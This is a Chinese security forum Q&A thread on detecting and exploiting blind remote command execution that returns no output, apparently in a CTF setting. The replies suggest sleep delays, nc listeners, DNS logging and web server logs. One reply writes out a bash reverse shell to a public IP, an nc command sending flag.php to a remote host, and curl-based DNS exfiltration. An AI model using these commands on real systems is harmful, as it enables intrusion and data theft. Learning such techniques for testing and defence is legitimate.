遇到没有回显的rce如何处理(dnslog除外)

请先 登录 后评论

5 个回答

YanXia

1.linux系统的话可以试试有没有延时来判断命令 sleep 5

2.利用nc命令在自己的vps上建立监听,来判断是否存在

请先 登录 后评论
Rain奕天

可以试试nc反弹  来判断

请先 登录 后评论
L1NG - 甲方安全
还有两种方法,1.使用ceye平台来接收回显,2.在Vps开启Web服务或防火墙没有禁用Icmp的时候,发送Http或Icmp包后会在日志中留下记录,直接查看日志记录即可获得命令回显。
请先 登录 后评论
Colorado

可以试试nc反弹,进行监听来判断

请先 登录 后评论
空城 - 安全小菜鸡

方法1.
使用cp 命令cp flag.php 1.txt
然后访问(该方法简单,但是可能禁止使用cp命令)

方法2.
DNSLOG获取回显
cmd=curl `命令`.域名

方法3.
反弹shell
自己公网服务器nc -vv -lp 8888
目标服务器:cmd=bash+-i+>&+/dev/tcp/47.95.206.199/8888+0>&1

方法4.
使用nc
自己公网服务器nc -ulp 8888
目标服务器:cmd=nc -u 47.94.35.59 8888 < flag.php
(要求目标服务器也有nc工具,-u参数调整为udp,当tcp不能使用的时候使用)

方法5.
curl上传文件读取源码


这篇文章写的还可以:

https://www.cnblogs.com/hello-py/articles/13385679.html

请先 登录 后评论